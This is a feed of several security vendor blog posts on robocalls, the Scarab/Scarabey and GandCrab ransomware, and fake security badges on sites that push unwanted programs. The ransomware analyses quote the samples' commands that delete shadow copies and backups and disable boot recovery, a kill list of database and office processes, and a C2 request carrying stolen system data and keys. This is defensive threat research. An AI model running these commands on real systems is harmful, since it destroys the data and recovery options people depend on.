Techie Feeds

Stop telephoning me-eh-eh-eh-eh: robocalls explained

Malwarebytes - Thu, 02/01/2018 - 19:11

If you’ve ever answered a call from anyone outside your contact list only to hear a recorded message playing back at you, you have just been robocalled. Unfortunately for American consumers, this happens several times a day, seven days a week. Suffice to say, this is beyond annoying—and it’s getting worse.

In their National Robocall Index, YouMail, a telecommunications service provider, revealed that nearly 10 billion robocalls were made by mid-2016 and predicted a total of 30 billion by the end of that year. Furthermore, YouMail announced that American consumers received a total of 30.5 billion robocalls in 2017.

Are robocalls the same as cold calls?

What spam is to email, robocall is to telecommunications devices, such as home phones, mobile phones, and VoIP landlines. There is usually no real human behind a robocall, only an automated, pre-recorded message—as the name suggests, calls are made by computers. On the other hand, cold calls, warm calls, social calls, and a more personalized and targeted form of cold calling salespeople are referring to as “smart calls” all require a live person.

Many types of robocalls are legal, as are emails, SMS/MMS, and phone calls. Unfortunately, they can be abused, too. So how can you tell the good from the bad?

Which are the “good” robocalls?

An example of legitimate robocalls comes from political parties, especially during election season. Their goal is to sway voters to go to another party or solicit donations. They are legally approved by the FCC.

Other examples include robocalls that notify users of canceled flights or airline changes; doctor or dental appointment reminders; class cancellations or school emergencies; and credit card fraud alerts, among others. Robocalls that are made on behalf of non-profit organizations and charities exist as well. But take note: although several of these types are legal, most robocalls are illegal and fraudulent in nature.

Which are  the bad robocalls?

Illegal robocalls generally contact recipients with the intention of stealing something from them. And that something might be your contact number, your financial information, or even your identity.

Here’s a rule of thumb: If you receive a call you didn’t consent to or does not contain emergency or critical information, then the robocall can be considered illegal.

Take note of the list of purported sources of robocalls below. Robocalls that claim to come from these organizations certainly do not. You can be sure that they’re always, always a scam:

  • IRS
  • Social Security Services (SSS)
  • Department of Motor Vehicles (DMV)
  • Cruise companies
  • Tech support

A new trend in illegal robocalling involves the use of numbers closely resembling those they are contacting. Ailsa Chang, a correspondent for NPR’s Planet Money podcast, documented her experience with this when she received a call from a number with the same area code and first three digits of her own contact number. This is known as neighbor spoofing.

The psychology behind neighbor spoofing is that recipients are more likely to pick up the call should they see a familiar-looking number because they believe the caller might be someone they know, like a colleague or their child’s school.

In this underground, lucrative business, scammers have become more creative, thanks to technology that has made it easier for them to make unwanted calls and more challenging for us to accurately detect and block.

Are you familiar with email spoofing? Read this to learn more about it.

I just enrolled in the National Do Not Call Registry. I shouldn’t be getting those deceptive robocalls now, right?

While it is true that legal businesses doing robocalls honor the National Do Not Call Registry, your average cybercriminal and scammer does not. In fact, numbers in this registry are no longer immune to those annoying robocalls.

Back in 2003, when the registry was first passed, it had been successful in deterring legal businesses from sending out unwanted calls. But things have significantly changed since then. For one thing, the Internet has gained popularity and usage, and the resources needed to make innumerable and inexpensive calls are easy enough to come by. Furthermore, it’s known that majority of these illegal robocalls originate outside the United States, making them difficult (if not impossible) to stop.

I’ve seen YouTube clips of people messing with phone scammers. Can I do that with these robocallers?

We don’t advise it. In fact, both the Better Business Bureau (BBB) and the FCC highly encourage phone users to never answer calls from numbers you don’t have in your contact list, from anonymous callers, or from numbers you don’t recognize. Doing otherwise can only make matters worse, as robocallers could be flagging your number for activity. For them, getting any response from a number is a sure sign that it’s active. And an active number could be targeted again and again. That said, ignoring such calls is probably the less thrilling yet the best course of action to take.

So what else can we do to mitigate bad robocalls once and for all?

Below are steps one can take to nip robocalling in the bud:

  • Report the call to the FCC, Federal Trade Commission (FTC), and your attorney general. Doing so will help the collective efforts of regulators and phone companies in blocking these numbers.
  • Do not give out your number online or post it publicly in your social media profiles. They will likely be scraped by scammers.
  • Use efficient apps to analyze the kind of call you receive and respond to it accordingly. So far, Nomorobo is (one of) the best in the market, and it won the Robocall Challenge by the FTC several years ago. Other useful apps include Truecaller, YouMail, PrivacyStar, Hiya, and Mr. Number.
  • Go old-school by turning off your landline’s ringer and then feeding the call to an answering machine with a caller ID. You can always return the call if you have determined that the caller is using a legitimate number or has actually left a message worth returning.
  • If you happen to pick up a call from a robocaller, either by accident or just for the heck of it, hang up immediately or don’t answer any question thrown at you. It’s highly likely that it records your voice to use it to authorize the billing of stolen credit cards.
  • Take advantage of added security measures or protocols your voice service providers offer. Late last year, the FCC has passed a rule that gives phone companies the power to proactively block numbers that do not or cannot make outgoing calls.

At this time, there’s no one solution for the complicated problem of nasty robocalls; however, consumers can pay it forward, helping those who are less in the know to stave off robocallers who’d like to rob them blind.

The next time you receive an unwanted call, don’t just flare up. Shut them up for good.

Additional reading:

The post Stop telephoning me-eh-eh-eh-eh: robocalls explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Scarab ransomware: new variant changes tactics

Malwarebytes - Wed, 01/31/2018 - 22:28

The Scarab ransomware was discovered in June 2017. Since then, several variants have been created and discovered in the wild. The most popular or widespread versions were distributed via the Necurs botnet and initially written in Visual C compiled. However, after unpacking, we’ve found that another variant discovered in December 2017, called Scarabey, is distributed a little differently, with a different payload code as well.

Scarabey, like most ransomware, is designed to demand a Bitcoin payment from its victims after encrypting files on their systems. However, instead of being distributed via Necurs malspam like the original Scarab, Scarabey was found targeting Russian users and being distributed via RDP/manual dropping on servers and systems.

In addition, Scarabey seems to not be packed in any samples we have come across. The malicious code is written in Delphi without the C++ packaging that Scarab has and the content and language of the ransom notes are different for each.

SAMPLES BEING REFERENCED SCARAB ORIGINAL: e8806738a575a6639e7c9aac882374ae
SCARABEY VARIANT: 9a02862ac95345359dfc3dcc93e3c10e The ransom notes

As far as the victim is concerned, the main difference between Scarabey and other Scarab ransomware is the language of the ransom note and the scare tactic used in the encryption message.

In the Scarab sample, the ransom note is written in English, however, it reads as if you translated word-for-word a Russian text into English, without knowing proper English grammar or syntax. Scarabey, on the other hand, is written in Russian. What’s interesting is that when you throw the Scarabey note into Google translate, as I have done below, it contains the same grammatical errors as the Scarab note.

Original Scarab message

Scarabey message, translated from Russian to English with Google translate

This is more proof that that the authors of Scarab are likely Russian speakers who had written the note in their native language and run it through a translator to be added into the Scarab code. It would then seem quite likely that, since they decided to target Russians. they released the Scarabey note in their native language to cover more victims.

Different threats

In the original Scarab versions, it warns: The longer the user waits, the more the price will go up.

For Scarabey, on the other hand, it tells users that for every day they wait, more and more files will be deleted, until there are no more files left for them to recover.

Essentially, the criminals are implying that they have copies of the unencrypted files to give back to the user, or that they have control of the victim computer to delete files. This is not true for a few reasons:

  1. Besides the fact that the volume of data transfer to send up every file on the victim’s computer is completely unreasonable, there is no network functionality for sending files to the malware authors to hold as ransom.
  2. There is no backdoor or remote access code in scarab or its variants, which makes the threat of deleting files on victim’s computer impossible.
  3. The decryption process, from our understanding, is that they will send you decryption software loaded with the unique key after the ransom is payed. Then you can run the software and decrypt your files. That being said, there is no way for them to limit what gets decrypted as it is done locally and offline.
  4. Nowhere in the malware’s code is there any section that deletes user’s files from the computer.

Specifically, in the message, you see the author implying that the code is initially decrypted server side, which is untrue:

“24 files are deleted every 24 hours. (we have copies of them)
If you do not run the decryption program within 72 hours, all the files on the computer are completely deleted, without the possibility of recovery.”

Then, the malware author gives the steps to decrypt, which reference the use of a decryption program sent to the victim after payment. A decryption software received after payment with your unique key will decrypt files locally:

“- After starting the decoder, the files are decoded within an hour.
– Decoders of other users are incompatible with your data, as each user
unique encryption key”

The conclusion here is that the deletion of files or the idea that the malware authors have access to delete files is purely a scare tactic used to urge users into sending money quickly.

Technical analysis

While comparing the code from Scarab to Scarabey, it became quite clear that this variant, although written in Russian and targeting Russian users, likely comes from the same authors of the original. Throughout the entire code, both variants of malware are almost byte-for-byte identical. In addition, the sub processes generated, the dropped files, the encryption method used, and the mutexes used are all identical between the original Scarab version and Scarabey. This is the reason we consider it a variant, rather than a new family.

The following image shows the output from the two malware variants. The only things that differ are the addresses of code and memory data references (highlighted in yellow and red).

Code analysis

The Scarabey variant is written in Delphi. First, it starts off by checking if it is the first time being run. It does this by checking if it has parameters passed in. If not, it checks to see if the following registry key has been set:


[First run check, registry key]

If not set (meaning it is the first time run), it checks that SEVNZ has not been created yet and executes cmd.exe to copy itself into temp roaming directory as sevnz.exe using:

cmd.exe /c copy /y C:\Users\virusLab\Desktop\9a02862ac95345359dfc3dcc93e3c10e.exe “C:\Users\virusLab\AppData\Roaming\sevnz.exe”

Then it spawns a process of itself with param ‘runas’ as it exits.

[verifies SEVNZ.EXE does not exist, copies self to SEVNZ.EXE. executes elf with ‘runas’ param]

Now the sub process takes over.

The code flow now enters the same function as before, and deletes SEVNZ and re-copies it. It skips over those initial sections because of the parameter passed in. It then executes the previously copied file sevnz.exe:


Then, it opens the process cmd.exe with command line…

“mshta.exe “javascript:o=new ActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘9a02862ac95345359dfc3dcc93e3c10f.exe’);close()}catch(e){}},10);””

…which simply waits and deletes itself, since the process can’t delete while running.

Now onto the SEVNZ.exe process:

The process checks to see if it is currently running as sevnz.exe by trying to delete

If it fails, it now knows that it is currently running as sevnz.exe rather than the original executable. Once it passes this check, it uses mtsha.exe to execute Javascript, which will delay and add itself into the registry auto-run:

mshta.exe “javascript:o=new ActiveXObject(‘WScript.Shell’);

Next, it proceeds to delete shadow volume copies, which is standard for ransomware to make sure users cannot restore encrypted files.

—–Executes these scripts with mtsha.exe:—–
o.Run(“cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0”,0);
o.Run(“cmd.exe /c wmic SHADOWCOPY DELETE”,0);
o.Run(“cmd.exe /c vssadmin Delete Shadows /All /Quiet”,0);
o.Run(“cmd.exe /c bcdedit “ new ActiveXObject(“WScript.Shell”);
o.Run(“cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP-keepVersions:0”,0);
o.Run(“cmd.exe /cwmicSHADOWCOPYDELETE”0);
o.Run(“cmd.exevssadminDeleteShadows /All/Quiet”,0);
o.Run(“cmd.exe /c bcdedit /set {default} recoveryenabled No”,0);
o.Run(“cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures”,0);

It then opens a thread that loops forever and makes sure no “key” processes are running. If any are found, it kills those processes. The reason for this is possibly that these processes have a lock on some files that the ransomware would have otherwise wanted to encrypt. So by killing these processes, it frees the files for encryption. The key processes are from a string generated:


In the main loop of the encryption function, it performs constant checks throughout the code for a mutex, and if it exists, this is a sign to clean itself up and remove itself from the system:


The encryption loop can be called through many different sections in the code, but the section that runs initially and performs the majority of the encryptions is pictured below:

Recursively goes through all folders and checks to make sure the extension is not .exe or .dll. If okay, it encrypts files and renames them with a .scarab extension.

[checking current file extension using POS(),  if exists as substr of “exe,dll”]

The encryption code does not directly use any crypto APIs. Instead, the AES code is embedded within the malware, as shown in the images above.

[section is the setup leading to the call to the main cryptor function] Encryption algorithym

We have determined that the algorithm for encryption is AES. A 4-byte chunk (0xDEFACE01) is tacked onto the buffer before the actual file data that it reads. This could be salt, or a joke from the malware author. It performs some data manipulation operations using generated bytes, which could likely be the initialization vector to create randomness.


The malware proceeds to run AES 256 on the data, via the AES_ALGO labeled function. We determined it’s AES 256 because of a few properties.

  1. It uses 16-character blocks. This is pretty standard for any type of AES. It encrypts 16 characters from the file at a time, which is 128 bits.
  2. What differentiates the versions of AES is the size of the keys and the number of encryption rounds. In this case, it uses 14 rounds, which is standard for AES 256, instead of 10, which is standard for AES 128.  The key size is also 256 bits (32 bytes or characters).
  3. The sub type CBC (cipher block chaining) is also being used. The main indicator for CBC here is that the previous cipher text is used to encrypt the next plain text block. In other words, the previous encrypted block is used as the initialization vector for the next block of data to encrypt.
[showing the flow for AES CBC, IV being used first, followed by previous cipher text being used as IV]

In this case, the IV bytes are being XORed against the plain text bytes as an initialization step to create more randomness in the results. As you can see from the next image, the output of AES is then copied into the variable that will be used at the beginning of the loop to initialize the next plain text block before performing AES on it. At this point, it should be clearly AES usage, despite not being called via crypto APIs.

[The image below shows where the previous cipher-text is used for initialization as the IV. NOTE: var_28 will contain the encrypted data]

Below are a few screenshots illustrating the algorithm. As you can see, the data is loaded into matrixes. Then, a series of data operations is performed against some hardcoded data, together with the encryption key bytes. What you are seeing below in the highlighted text is one set of operations (1 of 4) in a single round. Four of these sets make up one encryption round. This is because in order to perform the matrix mathematics, you need to perform the operation for each item in the matrix against each of the others. And as stated earlier, 14 rounds total are done.

The encoded encryption key is written in the registry ‘temp’ key:

If the key is found in the registry, it proceeds to the function that decodes the key from the registry into the raw encryption key. Otherwise, it jumps to new generate function.

This is interesting because it is the main key used to encrypt files. The format is similar to the key from the ransom note, but this one is longer, suggesting that the key given to the user as the ID is an encoded version of the key stored in the registry. Example of the dumped key:

[HKEY_CURRENT_USER\Software\ILRTISo] "temp"="VkIAAAAAAADpt9Q2lAzhCExfqjLoD3vSpluc678N56Zn8b7LVRxMi1ZsYk2HXD1e4s3tiefTmZJAc0vxPposvLzP0yaCh5+KRQm60U0EkzeB2NXetarabUFYgJxb8QRsygKaOqBriC4Bs4ajM24h=e2CsVNP9R3q==UXNmfRFGIsv7NR9BIxE35bdoFpTU8rMGQ14MeQcAii1iY7GpNoY3b4DOgfuKGo3qNC1MYKYdfpn0dbiow3f7ZQGClpwTZ0shFhkWk7aTA7TM1prtgJte7TWe=ERHg8GaFrZtVs9ylNTYPt5CmzHBdAIaXeKZvZnSSafbi83o9gLgAS1OxAb7LBtJpZAJDyBkuyJFR4dFbXztponIBKT1OjtTvTMy07+0B4jI3=K1QGuKSROjAdCF06TsjKWlvUw0iUHRGasz946H3Mnxu3GdCHrAp9Cd94bMo1x1PVdIi3bXSwobjgOlJgJPJC4Y6J4QIE=e45PDNzdK6aCY0uiQ0jOD=8lDWTp=+r+dbGJrJ12qn8CRnBwaFIpyNjDhzdMdTwyvExCmuOesOLms8S7TRoV1GcTyWJAQpSJYcR66H6CngM5GHopdpoTH4mWVOOYp5HFHTDAvMafomF2S6xEmUgXIcKpB7oNohO+Wx0cUmf95=+9uozHMBWE4kFhj+OOKw0I7w7HnwYfafhxsw0CmoOvorZztXk8whlh1d4U26z=aJ6JwH8wVBSszsRLQ+H4y3bRaeupq5Vo+smDfigjVVzCam4HoAdOKzN9MWiigl9Oi+4vTkSFFazc6HzyVaHg8luKGBJMhi2FNHTFO56RA"

Versus the key from the ransom note:

+4IAAAAAAADIGnmIHZL=FYRQCAN=AgKnzw+0uzFbXSR5AdFlfTrhWN9sifnho8LiX5=V8SbNVWyWWrdbTLipFEeeEv=9zLmnid8e UqlqKr2RUN=V7LdjoyNwjWMNbylRiGNAKWK6g9exeHhVfUrZ+9oRTq6Kp5eNe7kDdV7UMPVZ12=5pm9a+5lOMw==TNi2R2tUjFcK tTD3c9IZgJwOMgcOw3fRrmgaloh5cIV3V74DRy2segx13RDL4J6B+gJnfT2mxIZuBE1G5HcmuLHCoqQif2BamhfbMASCUEpOp7+Z G0jI=1PTmOhD3Yq4XjJWI4mc61AruRlaYqwPTUUbrsI0zTYX1mmM3Tvyso8bqDy4h5meyPYuXlgtRj06mtdrGZszb6ObsIT4Fz0O Ag=4HgI4VSHA=HAU5yCjZzIIkLhlWGvdAk

The key used to encrypt changes from file to file. Meaning that two files with identical content will be different after encryption. Essentially what happens is that there is a initial key and many sub keys are derived from that key. If just a single encryption key was used for all of the files (which has been seen with other ransomware), you would be able to capture memory at any point in the encryption process, save the key, and use it to decrypt all of the files on your hard drive. Unfortunately, because of this key cycling that Scarab performs, it makes decryption of the files likely impossible.

After full disk encryption is complete, the ransomware proceeds to a call function that enumerates all network folders and drives. For example: VMWare shared folders, Terminal services, Network Drives. If any are found, it encrypts the files within those folder as well.

Once complete, it opens the encryption message via notepad.exe.


There have been a number of articles we’ve come across online that state that Scarabey has the ability to act as a backdoor, allowing remote access, and also may gather sensitive data. From our analysis, we believe this to be untrue. We found no signs of any other functionality aside from simply encrypting files on user’s computer.

Additionally, there were rumors of Scarab being built off of the open source ransomware project on gitHub called HiddenTear. We have confirmed this to be untrue in both our own research and with external researchers. It seems to be an industry consensus now that it was mistakenly posted.

Malwarebytes for Windows detects this threat and its variant as: Ransom.Scarab.

The post Scarab ransomware: new variant changes tactics appeared first on Malwarebytes Labs.

Categories: Techie Feeds

GandCrab ransomware distributed by RIG and GrandSoft exploit kits

Malwarebytes - Tue, 01/30/2018 - 23:43

This post was authored by Vasilios Hioueras and Jérôme Segura

Late last week saw the appearance of a new ransomware called GandCrab. Surprisingly, it is distributed via two exploit kits: RIG EK and GrandSoft EK.

Why is this surprising? Other than Magnitude EK, which is known to consistently push the Magniber ransomware, other exploit kits have this year mostly dropped other payloads, such as Ramnit or SmokeLoader, typically followed by RATs and coin miners.

Despite a bit of a slowdown in ransomware growth towards the last quarter of 2017, it remains a tried and tested business that guarantees threat actors a substantial source of revenue.


GandCrab was first spotted on Jan 26 and later identified in exploit kit campaigns.

RIG exploit kit

The well-documented Seamless gate appears to have diversified itself as of late with distinct threads pushing a specific payload. While Seamless is notorious for having switched to International Domain Names (IDNs) containing characters from the Russian alphabet, we have also discovered a standard domain name in a different malvertising chain. (Side note: that same chain is also used to redirect to the Magnitude exploit kit.)

We observed the same filtering done upstream, which will filter out known IPs, while the gav[0-9].php step is a more surefire way to get the redirection to RIG EK.

At the moment, only the gav4.php flow is used to spread this ransomware.

GrandSoft exploit kit

This exploit kit is an oldie, far less common, and thought to have disappeared. Yet it was discovered that it too was used to redistribute GandCrab.

GrandSoft EK’s landing page is not obfuscated and appears to be using similar functions found in other exploit kits.

Ransom note

Interestingly, GandCrab is not demanding payment in the popular Bitcoin currency, but rather a lesser-known cryptocurrency called Dash. this is another sign that threat actors are going for currencies that offer more anonymity and may have lower transaction fees than BTC.

Technical analysis

After unpacking, the binary is pretty straight forward as far as analysis is concerned. There were no attempts to obfuscate data or code beyond just the first layer of the packer. Everything from the exclusion file types to web request variables, URLs, list of AVs—even the whole ransom message—is in plain text within the data section. On initial look-through, you can deduce what some of the functionality might be just by simply looking at the strings of the binary.

The code flow stays relatively inline, so as far as reverse engineering is concerned, it allows you to quite accurately analyze it even just statically in a disassembler. The code is divided up into three main segments: initialization, network, and encryption.


After unpacking, GranCrab starts out with a few functions whose tasks are to set up some information to be used later in the code. It queries information about the user such as:

  • username
  • keyboard type
  • computer name
  • presence of antivirus
  • processor type
  • IP
  • OS version
  • disk space
  • system language
  • active drives
  • locale
  • current Windows version
  • processor architecture

It specifically checks if the keyboard layout is Russian, writes out an integer representation for that result, and builds a string with all this info. Below is the code that is starting to write out the variable names to label the information gathered:

It then cycles through all letters of the alphabet querying if a drive exists and what type it is. If it is a CDRom, unknown, or non existent, it skips it. If a fixed drive is found, it copies its name to a buffer and copies a string describing what type of drive it is. For example, the C: drive is FIXED.

It then gets disk free space and information on sectors that it converts into another series of numbers via printf function tokens: C:FIXED_64317550592. It continues this for every drive and builds a list.

It puts all of the information gathered on the system together and you can assume, before you even get to this point in the code, that this will be sent up to a C2 server at some point, as it is in the format of a GET request. Here is an example of how the system info gets structured below:


It also searches running processes, checking against a finite set of antivirus programs that will also be converted to the info string for the C2 server.

It then proceeds to create a mutex with some system info along with a generated ID. For example:


In order to initialize itself for the future encryption, it cycles through a hardcoded list of processes to kill. This is a common technique among ransomware that attempts to kill processes that might have a lock on certain files, which it would like to encrypt.

msftesql.exe                        sqlagent.exe                           sqlbrowser.exe
sqlservr.exe                         sqlwriter.exe                         oracle.exe
ocssd.exe                             dbsnmp.exe                            synctime.exe
mydesktopqos.exe           agntsvc.exe                             isqlplussvc.exe
xfssvccon.exe                     mydesktopservice.exe       ocautoupds.exe
agntsvc.exe                         agntsvc.exe                             agntsvc.exe
encsvc.exe                          firefoxconfig.exe                  tbirdconfig.exe
ocomm.exe                        mysqld.exe                              mysqld-nt.exe
mysqld-opt.exe                 dbeng50.exe                          sqbcoreservice.exe
excel.exe                              infopath.exe                           msaccess.exe
mspub.exe                          onenote.exe                            outlook.exe
powerpnt.exe                    steam.exe                                 thebat.exe
thebat64.exe                      thunderbird.exe                    visio.exe
winword.exe                       wordpad.exe

Next, it calls the built-in crypto functions to generate keys. GandCrab generates the public and private keys on the client side and uses the standard Microsoft crypto libraries available using API calls from Advapi32.dll. It calls CryptGenKey with the RSA algorithm.

Network connection

Now it enters the main loop for the Internet functionality portion of the ransomware. This area of code either succeeds and continues to the encryption section of code, or it loops again and again attempting to succeed. If it never succeeds, it will never encrypt any file.

This section starts off by making a GET request to that saves the IP address returned and adds to the GET request string, which has been built with the system information.

It continues and takes a binary chunk, which is the RSA public key that was stored earlier in the initialization. That key is converted to base64 via the CryptBinaryToStringA API with the following parameters:


It will be tacked on the the existent GET string, which it has been building this whole time. Below is an example of the RSA key generated in binary and its conversion, followed by the finalized GET string with the base64 of the keys in it:

This is an example of an RSA public key generated with the crypto APIs:
A7 EC BD E2 49 43 E1 11 DA 12 10 E0 25 59 AA 83 77 35 FC 3E 49 C8 3B 6C 3D 91 CF FF 96 6E D8 45 FE 8A 58 20 E6 CB 91 AB 99 6A E2 04 EC 58 66 95 05 8C 2F 7E C6 19 6D 24 B5 5F C4 9A 01 3D 3B FB 31 4E AC 25 07 8C 0E 6C 57 4C C0 23 24 3A EB 57 97 17 79 F8 62 73 6B AD B2 09 60 BB B7 9A CF F9 5B 68 B8 C1 44 07 F5 5E 3E 06 FE C2 35 CF 99 82 29 28 37 1B E6 51 29 6C 0B 87 89 F9 90 26 F7 CC DA 75 C4 46 A1 E3 30 09 C0 6A CB 5E CB 87 8E 40 EF 4C 7E 02 AE E8 06 6A D7 24 FC 0E 40 EA 69 CD 6D 8D 24 92 6E 53 2F D2 69 D2 A2 F3 97 54 63 EB D9 C7 BD 9E 41 19 91 F1 6B D6 CA AD 9E 0E D3 0B A0 53 50 84 87 6D 49 4C 49 D2 3B 8E 80 F7 7F 35 F1 D7 A7 81 0F 90 04 40 AC 4B 7C ED 37 71 8A B1 FA 84 33 33 FB 62 EE 04 A3 C7 9A 47 2C 64 64 95 3D 34 A5 CC 12 6E E4 81 40 E6 7F 03 02 C4 57 D6

Which gets converted to:


And builds the GET string to send to the C2 with all the system information from earlier, and also the encryption keys:

action=call&ip= 7 Enterprise&os_bit=x64&ransom_id=c9ed65de824663fc&hdd=C:FIXED_64317550592/50065174528&pub_key=BgIAAACkAABSU0ExAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfW &priv_key=BwIAAACkAABSU0EyAAgAAAEAAQCn7L3iSUPhEdoSEOAlWaqDdzX8PknIO2w9kc//lm7YRf6KWCDmy5GrmWriBOxYZpUFjC9+xhltJLVfxJoBPTv7MU6sJQeMDmxXTMAjJDrrV5cXefhic2utsglgu7eaz/lbaLjBRAf1Xj4G/sI1z5mCKSg3G+ZRKWwLh4n5kCb3zNp1xEah4zAJwGrLXsuHjkDvTH4CrugGatck/A5A6mnNbY0kkm5TL9Jp0qLzl1Rj69nHvZ5BGZHxa9bKrZ4O0wugU1CEh21JTEnSO46A93818dengQ+QBECsS3ztN3GKsfqEMzP7Yu4Eo8eaRyxkZJU9NKXMEm7kgUDmfwMCxFfWGRZmQmHH5W5K1RYgSg8VJEFLebRW8+o7X0K30wzzrw5NHpJpVJYX8OKot8KvopS4wsZzuxu5YJih1ZYVgF6QT5FW4WEG3BzMtq5vGVqTmrlckudC0xfGlGb7J41vUkZsp6S07NTIIT7HtYJSA/pxS51Zg+13TfU0nxC92RkKuva/8Dzmgssm6uE7aYJQFEkUmkPImYreHGIPsffEEGtZM9zwz4tXbrXLch0BoRNHeR+GFLJclnLc5JMg/J4BLaS6js+RGxRbZGMPJDVX6lTEEl+aIYO38Wh49+Zcpzs4EOUfb1EsoLEDAZbppIWq8Yr1P6KtWkqIXRzjUk9HXiJm3qHm0u0vchV4iRAKz2MJ/xZdYjHp+C3qMTTsNbQbtcscpy13/rEv8oO6clfciSCPcthy5IkLFLKZQP5be+IcsAjxeSoOqqtEpNpj8nOKfZ5PvEs+/kn718vG0R5CMU4I0fyF0BD68AFat6dl5gHK1sKs0ndAvCKdDMg/HqO/JKUZRSza2VKkgxpXC57BRGNP0r/jYySGnqhE2owHQaXoEmP9tme1A8PHsAoNtUEd0SO4/pn4hDg70o/Nmph/UWqtOq9nSlrxQMD8Q08w4K2H1CC3eCAnHZOM8PTCDYH3nh6f/ftkVtyrpudTpicTjoUSEkwtEPRsWk7ff3F/Na8D2FcXSI5xQ6R+R2uy8GvVoxpBy8Xdh78VqViOBlu5+Jxp09PMQmI2EFususg4VJeH047Wayi2r+VemzAX1rTuMh2mRKfKa+eae+YBKjBUkIh9WPCmFjO+3lll7GqV7P4JFm1g2sjrm/dPWnoGzfg1E7brER6aD2q+w1+4o8wCzNTNvPH2bwPMyV6R+vbWOVZUTprzZ4sRr7KxT0ucZmNA76WX39NegSU56tOngYpAQprOMrJP0NYmrizT8FsCOcqlUGk0jf6moarJSWQxh2MxXtlpFAvJjPTqqKruIVMhIkTJ9aZHKnn02a5PIdLcs4a09D85js9klKZn90Gj6C4AxlT2nI/ba9mEx+7srvxxbh1XNgI987IWLsLYpWxHlRptJqIvI0ZAA3EuvwZuZ8f6sqLM2/rSxdOnFW5hd8am9zgopimktfkjFtsHpev/Svf0VlxQ3Fj22A06aXqfi7hmWPZ8ZCtZ874PUHgbrG3foNESQiTghT2NLV9rNNad7ij/kVA= &version=1.0 [Crypto key base 64 functions] [Section of code that is adding the encoded keys to the get string under priv_key parameter]

At this point, it is clear that the malware will be sending this info to the C2 server. This is interesting because it may be possible to pull the keys from memory and use them for the decryption of files. We will continue to investigate this and update the article if any discoveries are found.

GandCrab’s server is hosted on a .bit domain, and therefore it has to query a name server that supports this TLD. It does this by querying for the addresses of the following domains using the command:

nslookup [insert domain]

This command queries the name server, which support the .bit TLD for one of the domains below.

bleepingcomputer.bit nomoreransom.bit esetnod32.bit emsisoft.bit gandcrab.bit

The NSlookup child process is opened through a pipe that was created. This is done so that a child process can directly affect the memory in the parent process, rather than transferring outputs manually back and forth. It is an interesting and useful technique. You can look at the following section of code for more details:

The ransomware now attempts to send data to the server, and if an error occurs or the server was not reachable, it continues this whole process in an infinite loop until it finds one that works, re-querying for client IP and running nslookup again and again with different IP outputs. Unless it connects with the server, it will run until it is closed manually.

As mentioned before, it will not continue to the encryption routine until it finds a server, which means it will enter in an infinite loop of IP requests:

Once it finds one of these, it continues to open a thread that will start the main encryption functionality. However, before it begins, it opens another thread that creates a window and labels itself as Firefox.The window is loaded with code that will copy itself to the temp directory and set itself up in the registry. This is actually one of the few parts of the malware that is not taken directly from plain text. The file name copy of itself is a random series of letters generated by calling the cryptGenRandom function, and using its output on an array of letters.

The strange part about this function is not what it does, because it is creating persistence that we had been waiting for, but rather why a window was created in the first place. As far as we could understand, there is no benefit of launching a window to perform these tasks. Maybe it was experiment on the part of the author, but the intent remains unclear.

Encryption routine

As we have established from the initialization section of the malware, the encryption algorithm used is RSA. Before we get the encryption section, the code makes sure that it is not encrypting specific types of files that it considers protected. The files are the following, hard coded into the malware:

desktop.ini autorun.inf ntuser.dat iconcache.db bootsect.bak boot.ini ntuser.dat thumbs.db GDCB-DECRYPT.txt .sql

If it finds that the file name is on that list, it will skip it and continue to the next. It also skips looking into a folder if it is one of these key folders:

local app data windows programfiles program data ransomware localsettings

When it passes these checks and gets to a specific file, it runs one final check on the extension against a list of acceptable file extensions to be encrypted:

If all checks pass, it proceeds to use the previously generated keys along with some salt and random number generated to encrypt the file and rename it with a .GDCB extension. The main encryption loop is a recursive function that will eventually make it to every file on the drive.


Malwarebytes users are protected at the delivery chain (exploit protection), but we also proactively stopped this ransomware before having seen it, thanks to our anti-ransomware engine:


It is interesting to see a new ransomware being distributed via exploit kits in what so far seems to be a few ongoing campaigns. The other interesting aspect is that two distinct exploit kits are delivering it, although it is unclear if the same actor is behind both campaigns and experimenting with different distribution channels.

Indicators of Compromise

Seamless gate,xn--80abmi5aecft.xn--p1acf

GrandSoft EK (IP)

GandCrab (packed)


GandCrab (unpacked)


The post GandCrab ransomware distributed by RIG and GrandSoft exploit kits appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Stolen security logos used to falsely endorse PUPs

Malwarebytes - Tue, 01/30/2018 - 16:35

To gain the trust of users, many websites and companies feature the logos of reputable firms who endorse their products. Unfortunately, some unseemly companies do the same, using logos of companies who have not, in fact, endorsed their product in order to trick people into thinking that what they are about to install is legitimate. Potentially Unwanted Programs (PUPs) are masters in this trade of building false trust.

The most popular logos to used by criminals achieve this false trustworthiness are:

  • McAfee SECURE
  • Norton Secured Seal
  • Microsoft Partner Network/Microsoft Technologies

Below is an example of a website that has all three of them, so it must be the safest site imaginable. (Wrong.)

In fact, it is a fake online scanner that will try to scare you into thinking that your computer is infected with some nasty viruses and that their solution can take care of it. Actually, they will try to sell you a PUP like Master PC Cleaner that will inform you about even more problems with your system. To compound matters, they’ll then offer to help you get rid of them—for a price. Should you need assistance, many of these so-called “system optimizers” are not afraid to get involved in tech support scams either. Their support numbers are displayed prominently in their GUI.

So how do programs that can scam people out of money in three different ways get these badges of authentication on their sites? Likely, they are used without authorization. In fact, it is no harder than copying one of these logos from a Google image search and inserting the image onto the site.

What do these logos actually mean?

First of all, if the logos are used without authorization, they mean nothing. Nada. Niente. Putting a picture on a website does not change the way the site or product it offers behaves.

